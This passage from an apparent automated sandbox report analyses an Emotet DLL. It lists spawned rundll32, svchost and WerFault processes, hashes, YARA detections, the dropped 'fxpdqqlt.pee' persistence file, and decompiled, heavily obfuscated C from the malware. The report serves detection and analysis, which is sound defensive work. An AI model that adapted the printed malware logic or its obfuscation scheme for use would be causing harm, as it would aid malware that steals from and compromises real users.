                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.660358890.000000000331A000.00000004.00000020.sdmp, Author: Joe Security

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6552 Parent PID: 6044

                        General

                        Start time:00:45:19
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 1896 Parent PID: 572

                        General

                        Start time:00:45:19
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 204 Parent PID: 1896

                        General

                        Start time:00:45:20
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 5960 Parent PID: 3176

                        General

                        Start time:00:45:20
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 5748 Parent PID: 572

                        General

                        Start time:00:45:24
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 2268 Parent PID: 6404

                        General

                        Start time:00:45:28
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 5604 Parent PID: 1896

                        General

                        Start time:00:45:37
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 5652 Parent PID: 6404

                        General

                        Start time:00:45:38
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 3128 Parent PID: 572

                        General

                        Start time:00:45:56
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 360 Parent PID: 4244

                        General

                        Start time:00:46:04
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, Author: Joe Security

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 7084 Parent PID: 572

                        General

                        Start time:00:46:09
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Disassembly

                        Code Analysis

                        Reset < >

                          Analysis Process: loaddll32.exe PID: 6404 Parent PID: 2948 loaddll32.exeCOMMON

                          Executed Functions

                          Function 01121291, Relevance: 10.4, Strings: 8, Instructions: 383COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E01121291() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed short* _t429;
				signed int _t440;
				signed int _t442;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t461;
				signed int* _t491;
				void* _t492;
				signed short* _t498;
				signed int* _t499;

				_t499 =  &_v1728;
				_v1572 = 0x85db5f;
				_v1572 = _v1572 + 0xabd9;
				_v1572 = _v1572 ^ 0x00868711;
				_v1664 = 0xec20c6;
				_v1664 = _v1664 ^ 0x8ebb32ad;
				_v1664 = _v1664 >> 0xe;
				_v1664 = _v1664 ^ 0xc9da4224;
				_v1664 = _v1664 ^ 0xc9d33214;
				_v1672 = 0x7aeab7;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 >> 0x10;
				_v1672 = _v1672 * 0x29;
				_t442 = 0;
				_v1672 = _v1672 ^ 0x00070a11;
				_t492 = 0x1e2f185;
				_v1636 = 0x817462;
				_v1636 = _v1636 | 0x24691976;
				_v1636 = _v1636 + 0x95f6;
				_v1636 = _v1636 ^ 0x24ec5d0b;
				_v1644 = 0x77a6a5;
				_v1644 = _v1644 + 0xffffc90e;
				_v1644 = _v1644 << 1;
				_v1644 = _v1644 ^ 0x00e59261;
				_v1680 = 0xf31be;
				_v1680 = _v1680 | 0xd650deff;
				_v1680 = _v1680 << 9;
				_v1680 = _v1680 + 0xf487;
				_v1680 = _v1680 ^ 0xc00e87b4;
				_v1688 = 0x6142cc;
				_v1688 = _v1688 << 0x10;
				_v1688 = _v1688 | 0xd67339e5;
				_v1688 = _v1688 << 0xd;
				_v1688 = _v1688 ^ 0xe7390e48;
				_v1576 = 0x6cc5f;
				_v1576 = _v1576 | 0x19b4cce0;
				_v1576 = _v1576 ^ 0x19baa07f;
				_v1724 = 0xbf4a96;
				_t444 = 0x5e;
				_v1724 = _v1724 / _t444;
				_v1724 = _v1724 << 6;
				_t445 = 6;
				_v1724 = _v1724 / _t445;
				_v1724 = _v1724 ^ 0x001fb8e8;
				_v1624 = 0x45a64f;
				_v1624 = _v1624 << 1;
				_v1624 = _v1624 >> 0xf;
				_v1624 = _v1624 ^ 0x000b503d;
				_v1684 = 0xb25e00;
				_v1684 = _v1684 >> 8;
				_v1684 = _v1684 ^ 0xb04bdaf3;
				_v1684 = _v1684 | 0x528abcb4;
				_v1684 = _v1684 ^ 0xf2c0da40;
				_v1716 = 0xe3eb63;
				_v1716 = _v1716 + 0x4bb4;
				_v1716 = _v1716 | 0x24706c23;
				_v1716 = _v1716 + 0xffff0bad;
				_v1716 = _v1716 ^ 0x24f80a2d;
				_v1660 = 0x9c5bdc;
				_v1660 = _v1660 | 0xcf478232;
				_v1660 = _v1660 >> 1;
				_t446 = 0xe;
				_v1660 = _v1660 / _t446;
				_v1660 = _v1660 ^ 0x076aa47c;
				_v1668 = 0xa625ec;
				_t447 = 0x7d;
				_v1668 = _v1668 / _t447;
				_v1668 = _v1668 + 0x365e;
				_v1668 = _v1668 << 0xd;
				_v1668 = _v1668 ^ 0x31544487;
				_v1708 = 0x6b5520;
				_v1708 = _v1708 + 0xf8d2;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 >> 4;
				_v1708 = _v1708 ^ 0x0d8d8c55;
				_v1600 = 0x9430bd;
				_t448 = 0x36;
				_v1600 = _v1600 / _t448;
				_v1600 = _v1600 ^ 0x000afaf2;
				_v1620 = 0x86cfb6;
				_v1620 = _v1620 << 1;
				_v1620 = _v1620 + 0xffff889a;
				_v1620 = _v1620 ^ 0x0109f82c;
				_v1564 = 0xa631e3;
				_v1564 = _v1564 + 0xf4ba;
				_v1564 = _v1564 ^ 0x00a80ade;
				_v1676 = 0x7979a8;
				_v1676 = _v1676 << 7;
				_v1676 = _v1676 << 0x10;
				_v1676 = _v1676 + 0x9d4f;
				_v1676 = _v1676 ^ 0xd402292e;
				_v1700 = 0x9cb407;
				_t449 = 0x74;
				_v1700 = _v1700 / _t449;
				_v1700 = _v1700 ^ 0xb8dd2e27;
				_v1700 = _v1700 + 0x1cb3;
				_v1700 = _v1700 ^ 0xb8dbb093;
				_v1588 = 0x57c273;
				_v1588 = _v1588 ^ 0xbac546e2;
				_v1588 = _v1588 ^ 0xba9f2ece;
				_v1652 = 0x72d309;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 + 0x1eac;
				_v1652 = _v1652 ^ 0x0008e8eb;
				_v1728 = 0xc706e;
				_v1728 = _v1728 << 1;
				_v1728 = _v1728 << 0xc;
				_t450 = 0x26;
				_v1728 = _v1728 * 0x45;
				_v1728 = _v1728 ^ 0x49b77e5b;
				_v1640 = 0x7522e5;
				_t203 =  &_v1640; // 0x7522e5
				_v1640 =  *_t203 * 0x5c;
				_t205 =  &_v1640; // 0x7522e5
				_v1640 =  *_t205 / _t450;
				_v1640 = _v1640 ^ 0x0119d43e;
				_v1692 = 0xbb4804;
				_v1692 = _v1692 + 0xffff70c6;
				_v1692 = _v1692 << 0xf;
				_v1692 = _v1692 + 0x3f9;
				_v1692 = _v1692 ^ 0x5c613920;
				_v1712 = 0x28f594;
				_t451 = 0x4e;
				_v1712 = _v1712 * 0x7e;
				_v1712 = _v1712 / _t451;
				_v1712 = _v1712 | 0x51c800e0;
				_v1712 = _v1712 ^ 0x51cdbf54;
				_v1580 = 0x7adb62;
				_v1580 = _v1580 + 0x1c1;
				_v1580 = _v1580 ^ 0x0077f071;
				_v1720 = 0xc70a86;
				_v1720 = _v1720 << 7;
				_t452 = 0x56;
				_v1720 = _v1720 * 0x1f;
				_v1720 = _v1720 ^ 0x9dec4920;
				_v1720 = _v1720 ^ 0x90c44137;
				_v1704 = 0x9ba56a;
				_v1704 = _v1704 >> 0x10;
				_v1704 = _v1704 | 0x058efec6;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 ^ 0xb1d841ad;
				_v1612 = 0x4e3e19;
				_v1612 = _v1612 | 0x42034613;
				_v1612 = _v1612 + 0xa5db;
				_v1612 = _v1612 ^ 0x4251fd7d;
				_v1596 = 0xecd59;
				_v1596 = _v1596 << 0xf;
				_v1596 = _v1596 ^ 0x66a56977;
				_v1632 = 0xfd16cc;
				_v1632 = _v1632 >> 0x10;
				_v1632 = _v1632 | 0xf759e487;
				_v1632 = _v1632 ^ 0xf75ce35e;
				_v1568 = 0xf13a15;
				_v1568 = _v1568 + 0xffffe5fa;
				_v1568 = _v1568 ^ 0x00f08e2f;
				_v1696 = 0xb25c71;
				_v1696 = _v1696 >> 5;
				_v1696 = _v1696 + 0xffff6fed;
				_v1696 = _v1696 | 0x9a7ee50f;
				_v1696 = _v1696 ^ 0x9a75ce05;
				_v1584 = 0xd4d15a;
				_v1584 = _v1584 | 0xed45407c;
				_v1584 = _v1584 ^ 0xedd29953;
				_v1648 = 0x645714;
				_v1648 = _v1648 / _t452;
				_v1648 = _v1648 ^ 0xa5463a61;
				_v1648 = _v1648 ^ 0xa540957b;
				_v1592 = 0x7bc2a2;
				_v1592 = _v1592 | 0xe79bdf7f;
				_v1592 = _v1592 ^ 0xe7f9ba68;
				_v1608 = 0xeb425b;
				_v1608 = _v1608 | 0x6f37f89f;
				_v1608 = _v1608 ^ 0x6ff0358e;
				_v1616 = 0xd90b05;
				_v1616 = _v1616 + 0x5fe2;
				_v1616 = _v1616 + 0xb3d9;
				_v1616 = _v1616 ^ 0x00d0b302;
				_v1628 = 0x5d6f98;
				_v1628 = _v1628 ^ 0x53a08d2a;
				_t453 = 0x1a;
				_v1628 = _v1628 * 0x15;
				_v1628 = _v1628 ^ 0xe3d40ccf;
				_v1656 = 0x3ffc42;
				_v1656 = _v1656 | 0xeccb51bd;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 / _t453;
				_v1656 = _v1656 ^ 0x004cf9e1;
				_v1604 = 0xad51da;
				_v1604 = _v1604 + 0xffffadf7;
				_v1604 = _v1604 ^ 0x00a3928b;
				_t498 = _v1604;
				while(_t492 != 0x1e2f185) {
					if(_t492 == 0x2b93872) {
						_t498 = E01107E66();
						_t492 = 0x31259bb;
						continue;
					}
					if(_t492 == 0x31259bb) {
						_t429 = _t498;
						__eflags =  *_t498 - _t442;
						if(__eflags == 0) {
							L17:
							_t492 = 0xc3103c3;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t429 - 0x2c;
							if( *_t429 != 0x2c) {
								goto L16;
							}
							_t491 =  &_v1560;
							while(1) {
								_t429 =  &(_t429[1]);
								_t461 =  *_t429 & 0x0000ffff;
								__eflags = _t461;
								if(_t461 == 0) {
									break;
								}
								__eflags = _t461 - 0x20;
								if(_t461 == 0x20) {
									break;
								}
								 *_t491 = _t461;
								_t491 =  &(_t491[0]);
								__eflags = _t491;
							}
							_t453 = 0;
							__eflags = 0;
							 *_t491 = 0;
							L16:
							_t429 =  &(_t429[1]);
							__eflags =  *_t429 - _t442;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t492 == 0x735677c) {
						_push(_t453);
						E0111EA55(_t498, _v1608, __eflags, _v1616, _t442, _v1628, _t442, _v1656, _v1604, _t442);
						_t442 = 1;
						__eflags = 1;
						L23:
						return _t442;
					}
					if(_t492 == 0x849210b) {
						E0110B3B4(_v1564, _t453, _v1676, _t453, _v1700,  &_v1040, _v1588, _v1572);
						E0111855C( &_v520, _v1652, __eflags, _v1728, _v1640, _v1564, _v1692);
						_push(_v1720);
						_push(_v1580);
						E01112EA5( &_v520, __eflags,  &_v1040, 0x11010f0, _v1612, _v1596, E0111CD35(0x11010f0, _v1712, __eflags), _v1632, _v1568, _t498);
						_t453 = _v1696;
						E0111629F(_t453, _t435, _v1584, _v1648, _v1592);
						_t499 =  &(_t499[0x18]);
						_t492 = 0x735677c;
						continue;
					}
					_t509 = _t492 - 0xc3103c3;
					if(_t492 == 0xc3103c3) {
						_push(_v1624);
						_push(_v1724);
						_t440 = E01102C3A(_v1684,  &_v1560, _v1716, E0111CD35(0x1101070, _v1576, _t509), _v1660); // executed
						_t453 = _v1668;
						asm("sbb edi, edi");
						_t492 = ( ~_t440 & 0xfc429d7e) + 0xc06838d;
						E0111629F(_t453, _t439, _v1708, _v1600, _v1620);
						_t499 =  &(_t499[8]);
					}
					L20:
					if(_t492 != 0xc06838d) {
						continue;
					}
					goto L23;
				}
				_t453 = _v1664;
				E0111365D(_t453,  &_v1560, _v1672, 0x208, _v1636, _v1644);
				_t499 =  &(_t499[4]);
				_t492 = 0x2b93872;
				goto L20;
			}


































































                          0x01121291
                          0x01121297
                          0x011212a4
                          0x011212af
                          0x011212ba
                          0x011212c2
                          0x011212ca
                          0x011212cf
                          0x011212d7
                          0x011212df
                          0x011212e7
                          0x011212ec
                          0x011212fa
                          0x011212fe
                          0x01121300
                          0x01121308
                          0x0112130d
                          0x01121315
                          0x0112131d
                          0x01121325
                          0x0112132d
                          0x01121335
                          0x0112133d
                          0x01121341
                          0x01121349
                          0x01121351
                          0x01121359
                          0x0112135e
                          0x01121366
                          0x0112136e
                          0x01121376
                          0x0112137b
                          0x01121383
                          0x01121388
                          0x01121390
                          0x0112139b
                          0x011213a6
                          0x011213b1
                          0x011213bf
                          0x011213c4
                          0x011213ca
                          0x011213d3
                          0x011213d8
                          0x011213de
                          0x011213e6
                          0x011213ee
                          0x011213f2
                          0x011213f7
                          0x011213ff
                          0x01121407
                          0x0112140c
                          0x01121414
                          0x0112141c
                          0x01121424
                          0x0112142c
                          0x01121434
                          0x0112143c
                          0x01121444
                          0x0112144c
                          0x01121454
                          0x0112145c
                          0x01121464
                          0x01121467
                          0x0112146b
                          0x01121473
                          0x01121483
                          0x01121488
                          0x0112148e
                          0x01121496
                          0x0112149b
                          0x011214a3
                          0x011214ab
                          0x011214b3
                          0x011214b8
                          0x011214bd
                          0x011214c5
                          0x011214d7
                          0x011214dc
                          0x011214e5
                          0x011214f0
                          0x011214fb
                          0x01121502
                          0x0112150d
                          0x01121518
                          0x01121523
                          0x0112152e
                          0x01121539
                          0x01121541
                          0x01121546
                          0x0112154b
                          0x01121553
                          0x0112155b
                          0x01121567
                          0x0112156c
                          0x01121572
                          0x0112157a
                          0x01121582
                          0x0112158a
                          0x01121595
                          0x011215a0
                          0x011215ab
                          0x011215b3
                          0x011215b8
                          0x011215c0
                          0x011215c8
                          0x011215d0
                          0x011215d4
                          0x011215de
                          0x011215e1
                          0x011215e5
                          0x011215ed
                          0x011215f5
                          0x011215fa
                          0x011215fe
                          0x01121606
                          0x0112160a
                          0x01121612
                          0x0112161a
                          0x01121622
                          0x01121627
                          0x0112162f
                          0x01121637
                          0x01121644
                          0x01121645
                          0x0112164f
                          0x01121653
                          0x0112165d
                          0x01121665
                          0x01121670
                          0x0112167b
                          0x01121686
                          0x0112168e
                          0x0112169a
                          0x0112169d
                          0x011216a1
                          0x011216a9
                          0x011216b1
                          0x011216b9
                          0x011216be
                          0x011216c6
                          0x011216cb
                          0x011216d3
                          0x011216de
                          0x011216e9
                          0x011216f4
                          0x011216ff
                          0x0112170a
                          0x01121712
                          0x0112171d
                          0x01121725
                          0x0112172a
                          0x01121732
                          0x0112173a
                          0x01121745
                          0x01121750
                          0x0112175b
                          0x01121763
                          0x01121768
                          0x01121770
                          0x01121778
                          0x01121780
                          0x0112178b
                          0x01121796
                          0x011217a1
                          0x011217b1
                          0x011217b5
                          0x011217bd
                          0x011217c5
                          0x011217d0
                          0x011217db
                          0x011217e6
                          0x011217f1
                          0x011217fc
                          0x01121807
                          0x01121812
                          0x0112181d
                          0x01121828
                          0x01121833
                          0x0112183b
                          0x01121848
                          0x01121849
                          0x0112184d
                          0x01121855
                          0x0112185d
                          0x01121865
                          0x01121870
                          0x01121874
                          0x0112187c
                          0x01121887
                          0x01121892
                          0x0112189d
                          0x011218a4
                          0x011218b6
                          0x01121a70
                          0x01121a72
                          0x00000000
                          0x01121a72
                          0x011218c2
                          0x01121a1e
                          0x01121a20
                          0x01121a24
                          0x01121a59
                          0x01121a59
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01121a26
                          0x01121a26
                          0x01121a26
                          0x01121a2a
                          0x00000000
                          0x00000000
                          0x01121a2c
                          0x01121a41
                          0x01121a41
                          0x01121a44
                          0x01121a47
                          0x01121a4a
                          0x00000000
                          0x00000000
                          0x01121a35
                          0x01121a39
                          0x00000000
                          0x00000000
                          0x01121a3b
                          0x01121a3e
                          0x01121a3e
                          0x01121a3e
                          0x01121a4c
                          0x01121a4c
                          0x01121a4e
                          0x01121a51
                          0x01121a51
                          0x01121a54
                          0x01121a54
                          0x00000000
                          0x01121a26
                          0x011218ce
                          0x01121ab3
                          0x01121ad9
                          0x01121ae3
                          0x01121ae3
                          0x01121ae7
                          0x01121af0
                          0x01121af0
                          0x011218da
                          0x0112197a
                          0x0112199a
                          0x0112199f
                          0x011219a8
                          0x011219ec
                          0x01121a08
                          0x01121a0c
                          0x01121a11
                          0x01121a14
                          0x00000000
                          0x01121a14
                          0x011218dc
                          0x011218e2
                          0x011218e8
                          0x011218f1
                          0x01121917
                          0x01121934
                          0x01121938
                          0x01121940
                          0x01121946
                          0x0112194b
                          0x0112194b
                          0x01121aa5
                          0x01121aab
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01121ab1
                          0x01121a94
                          0x01121a98
                          0x01121a9d
                          0x01121aa0
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 9a\$ Uk$#lp$$[B$^6$|@E$"u$_
                          • API String ID: 0-1868176208
                          • Opcode ID: 1c170e7f30a04d2df7ea9646c61b9d0fc7bec8da7410b20a93e23e36a2b77e71
                          • Instruction ID: 80e37868d05b827cb11a69d157ff32e27061da1f8277ce1305deedaf39b9750a
                          • Opcode Fuzzy Hash: 1c170e7f30a04d2df7ea9646c61b9d0fc7bec8da7410b20a93e23e36a2b77e71
                          • Instruction Fuzzy Hash: D91212725093809FD369CF24C58AA8BBBF2FBD4758F10891DE1DA86260D7B58949CF03
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE9990, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ECE9B65
                          • GetLastError.KERNEL32 ref: 6ECE9B6B
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6ECE9B87
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocCreateErrorFileLastVirtual
                          • String ID: asd
                          • API String ID: 1112224254-4170839921
                          • Opcode ID: e1a69a4efb5faa39d244f040b76a6d0727b2c6daa4d3f19fd9f4538f6ba13e80
                          • Instruction ID: 06a5c8b6e1ad33d812d2f40eb9f9a2a4835d4d710d012f3cd9840b51a311d08b
                          • Opcode Fuzzy Hash: e1a69a4efb5faa39d244f040b76a6d0727b2c6daa4d3f19fd9f4538f6ba13e80
                          • Instruction Fuzzy Hash: 76E11072A083168FCB50CF99C880B6AB7F1FF88714F1445ACE8599B74AE371E955CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD1290, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 136memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE97D6
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE97F4
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE980D
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE980F
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE9816
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE9834
                          • GetProcessHeap.KERNEL32 ref: 6ECD1337
                          • HeapAlloc.KERNEL32(011C0000,00000000,00023000), ref: 6ECD1351
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECD1435
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick$Heap$AllocFreeProcess
                          • String ID: '`Ly
                          • API String ID: 2047189075-560155178
                          • Opcode ID: fc48c8a0b0143ad4c7592a39922905e85ffb15ff5135e5b733002f4246bfdf29
                          • Instruction ID: 46bd565e49150a0159434280e23e0f7894e69af22895f1fa4e2730b98cabe18d
                          • Opcode Fuzzy Hash: fc48c8a0b0143ad4c7592a39922905e85ffb15ff5135e5b733002f4246bfdf29
                          • Instruction Fuzzy Hash: A2518871A00B408FD3258F69D880B56BBF5FF48318F108A2DE9968BB55E735F509CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEA21B, Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6ECEA262
                          • ___scrt_uninitialize_crt.LIBCMT ref: 6ECEA27C
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          • Opcode ID: 3833e96bf5a728211de00ae9e62e98cb1dc4b3f69f75b8aa3b5a5b96195dc364
                          • Instruction ID: 872d47036241cfabb77b1722cd51ccf7633bf0d916fdead0fde69d576a69f1f7
                          • Opcode Fuzzy Hash: 3833e96bf5a728211de00ae9e62e98cb1dc4b3f69f75b8aa3b5a5b96195dc364
